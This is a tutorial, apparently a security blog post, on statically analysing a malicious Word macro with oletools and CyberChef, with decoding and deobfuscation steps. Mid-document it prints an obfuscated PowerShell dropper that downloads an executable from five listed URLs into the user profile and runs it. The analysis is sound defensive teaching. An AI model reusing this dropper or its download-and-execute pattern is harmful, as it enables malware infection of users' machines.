Static analysis is the process of analysing malicious code, whether it be a script or a program, to determine what action the code is trying to execute. Unlike dynamic analysis, static analysis does not involve executing or running the code.

There are loads of open source tools out there which can be used to perform static analysis, today we are going to be looking OLE Tools, and CyberChef.

OLE Tools is a Python package used to analyse Microsoft Office documents. Malicious VBA scripts within Macros embedded in Office documents is a common malware distribution technique, so OLE Tools is a very useful tool to have in your toolkit.

CyberChef is a web application created by GCHQ, it is often referred to as the swiss army knife tool of cyber, and can be used for encryption, encoding, compression and data analysis, it’s a must-have tool in any toolkit.

NOTE: It’s worth noting that this guide is meant to demonstrate the steps to reverse common obfuscation techniques. You may encounter different obfuscation techniques depending on the document sample you have, however, the same logic can still be applied.

Getting Setup

If you haven’t already, install pip.

sudo apt install python3-pip

Then install oletools.

sudo -H pip install -U oletools

Find a malicious office document, there are a number of sources where you can download these files, see the resources section at the bottom of this page for a list of sample websites.

I would suggest cape sandbox as it does not require any signup and allows you to get your hands on a sample quickly, make sure you select a sample with the file type “doc”.

Using oletools

Once you’ve got everything prepared, navigate to the directory where your downloaded file lives. Run the first command to obtain meta data around the file. (Replace the text “filename” with the name of the malicious file that you downloaded.)

olemeta "filename"

Running this command is going to return some useful meta data around the document.

Output from running “olemeta” on our malicious document

It is macros embeded in the document that we are interested in, so next lets see if the file contains any macros. Run the oleid command.

oleid "filename"

By running this command we can see that the document does contain a VBA Macro. This is what we’re interested in.

Output from running “oleid” on our malicious document

Lets try to extract those macros out of the document, run the olevba command.

olevba "filename"

The table shown in the image below will be displayed at the bottom of your terminal session, it contains an overview of what was found in the macro. The information we are interested in the most is the Base64 encoded strings. Encoding with Base64 is a common technique used by malware authors to try and obfuscate their code and make it more difficult for anti-virus to detect.

Output from running “olevba” command on our malicious document

If you scroll up the page you will see all of the data pulled from the macro, we want to find the Base64 encoded text. You should be able to easily recongise Base64 encoding, in this case it’s the big block of text.

Visual basic code from document macro encoded in Base64

Lets copy the text and take it over to CyberChef.

Using CyberChef

The first thing to do is to take the base64 encoded text and decode it, we do this by dragging the “from Base64” operator into the recipe column. Paste the encoded text block into the input box.

Code decoded using from Base64 operator

Tip: If you’re ever unsure on the format of a piece of text or what it has been encoded with, you can use the magic operator to find out!

You should immediately be able to see that the output is now more understandable, however, the author has taken a number of steps to further obfuscate the code and make it more difficult for us to analyse. Adding punctuation between characters is a common obfuscation technique used by malware authors, as displayed in our code block below.

$.c.6.9.5.3.7.2.4.=.'.I.4.4.2.9.8.7.7.'.;.$.f.1.6.2.1.1.0.0. .=. .'.6.5.6.'.;.$.W.8._.8.6.7.=.'.U.8.3.7.3.6.0.6.'.;.$.N.1.6._.7.2.3.=.$.e.n.v.:.u.s.e.r.p.r.o.f.i.l.e.+.'.\.'.+.$.f.1.6.2.1.1.0.0.+.'...e.x.e.'.;.$.P.6.9.8.0.7.=.'.P.5.5.6.4.3.0.7.'.;.$.S.3.2._.7.2.=...(.'.n.e.w.-.o.b.j.'.+.'.e.'.+.'.c.t.'.). .n.e.t...W.`.e.B.`.C.L.i.E.N.T.;.$.V.8.3.8.4.6.=.'.h.t.t.p.:././.e.a.d.h.m...c.o.m./.p.u.b.l.i.c._.h.t.m.l./.F.J.C.D.S.z.U.f.m./.@.h.t.t.p.:././.w.w.w...c.a.t.-.s.c.h.o.o.l...r.u./.u.s./.7.1.0.y.f.0.n._.u.a.7.x.4.j.-.7.4.7.9.9.9.4./.@.h.t.t.p.:././.w.w.w...a.h.o.r.a.s.e.g.u.r.o...d.m.c.i.n.t.l...c.o.m./.w.p.-.a.d.m.i.n./.V.y.z.f.D.U.J.D./.@.h.t.t.p.:././.w.w.w...c.a.n.d.a.s.y.a.p.i...c.o.m./.c.g.i.-.b.i.n./.k.b.d.3.o.6.a.i.k._.n.6.g.t.d.b.v.-.5.5./.@.h.t.t.p.:././.d.o.m.u.s.w.e.a.l.t.h...k.a.y.a.k.o.d.e.v...c.o.m./.w.p.-.c.o.n.t.e.n.t./.u.p.l.o.a.d.s./.r.L.D.c.C.y.A.u.b.M./.'...s.P.L.i.t.(.'.@.'.).;.$.s.8.8.1.3.7.2._.=.'.E.8.0.3._.3.4._.'.;.f.o.r.e.a.c.h.(.$.o.5.6.2._.1. .i.n. .$.V.8.3.8.4.6.).{.t.r.y.{.$.S.3.2._.7.2...d.o.W.N.l.O.a.D.F.I.l.E.(.$.o.5.6.2._.1.,. .$.N.1.6._.7.2.3.).;.$.s.5.5.9.4.6.4.0.=.'.j.7.5.1.7.0.'.;.I.f. .(.(.&.(.'.G.'.+.'.e.t.'.+.'.-.I.t.e.m.'.). .$.N.1.6._.7.2.3.)...l.E.n.g.t.h. .-.g.e. .3.1.8.3.5.). .{.&.(.'.I.n.v.'.+.'.o.k.e.'.+.'.-.I.t.e.m.'.). .$.N.1.6._.7.2.3.;.$.K.7.0.7.6.8.=.'.J.7.1.0._.1.5.'.;.b.r.e.a.k.;.$.Q._.8.8.3.3.7.=.'.Y.4.0.7.1.8.'.}.}.c.a.t.c.h.{.}.}.$.Q.2._.9.0.2.8.1.=.'.U.2.9.6.1.1.'.

We’re going to take our decoded code block, and use other features in CyberChef to reverse the obfuscation and make the code more understandable. Firstly we’re going to remove the full stops between each character. Keep the “from base64” operator in your recipe, drag the Regular expression operator in as well, keep the settings at their defaults, this should remove the false stops.

Output of code with from base64 and Regular expression operators

That already looks a lot better, you should be able to see some useful information like URLs in the output, there is still some obfuscation via punctuation in the code though, so let’s remove them.

We’re going to start a new CyberChef recipe now because sometimes using lots of operators together can cause CyberChef to freak out a little. So copy the output to your clipboard, and start a new recipe.

In your new recipe paste the copied code into the input, and add the following operators.

  • To Lower Case
  • Find and Replace, x4 with the following settings.
    • All variables set to “simple string”
    • With the values
      • `
      • +
    • The “replace” value should be blank for each. This replaces the punctuation with nothing, effectively removing it from the code.
  • Generic Code Beautify (to tidy the code up a little).
Code output after full reciepe is applied.

Hopefully after all of that you should end up with something a lot more readable. We are not done there however, we’re going to take the output and perfrom some manual editing to get a better idea of what the code is doing.

Editing with Atom

Atom is a text/source code editor, it’s my go-to choice for working with any code within Linux, see the resources section for a guide on how to install atom.

First things first, we need to install a Visual Basic package in Atom to highlight syntax for us. Do this by going to the top toolbar in Atom, click on Packages > Settings View > Install Packages.
In the search bar search for VBA, and install one of the syntax highlighting packages for Visual Basic. Copy the most recent output of CyberChef, and paste it into Atom, make sure to save the file with the extension .vba so Atom can perform syntax highlighting.

VBA script with syntax highlighting in Atom.

There is still a fair amount of junk incorporated into this visual basic code. The author has defined a lot of the important components as variables, with names that give us no indication as to what they do. He has also included some junk variables as well to bulk to the code, let’s remove those first.

Defined variables which only appear once in the code, and appear to have no meaningful value are junk variables, those are the ones we want to remove. Below shows some of the junk variables from the code, note how they all fit a similar pattern. Removing these is not overall necessary, but it does help us tidy up the code a little.

$c6953724 = i4429877;
$w8_867 = u8373606
$p69807=p5564307
$s5594640=j75170
$q2_90281=u29611

The next thing we want to do is give the important variables a meaningful name. We do this by copying the name of a variable, let’s take $v83846 as an example, if we do a find and replace (control f) we can see this variable is called twice. Focus on the image below, this shows the two occurrences of the variable.

Firstly when the variable $v83846 is first defined we see a bunch of URLs bundled together separated by the “@” symbol, and at the end of the statement, there is a split on the “@” symbol. The author has bundled the URLs together and used the split function so the compiler knows to treat each URL as an individual. We can safely assume that the variable $v83846 is a list of websites, so we can rename the variable to something more useful like “sitelist“.

Highlighted variable renamed to sitelist.

We then see a foreach statement, which again refers to our previously defined variable, followed by a try statement, where it appears it is trying to download a file. It is clear the code is trying to download a file, and it has a number of sites which it is going to try and download these files from.

If we rename all of the useful variables, we should end up with something as shown below. This gives us a much better picture of what’s going on.

Code after useful variables renamed and tidying.

The script is attempting to download a file called 656 from one of the five different domains stored in the site list, it’s going to download the file into the users home directory (as defined by “userprofile“) and if the file is of a certain size (around 30MB) it’s going to attempt to invoke/execute. The reason for checking the file size is to see if the file downloaded successfully or was stopped by antivirus.

This kind of VBA script is what is known as a dropper, it’s sole purpose is to download addtional malware onto the users device. Using malcious macros embeded in Word document sent via emails is a technique used heavily by Emotet, a previliant malware campagin which in recent months has become a common way of spreading other malware.

Conclusion

That brings us to the end of this post. Hopefully, now you’ll have a better idea of how you can use open-source tools to analyse malicious office documents. Malicious documents attached in emails is still an effective and heavily used technique to spread malware.

Resources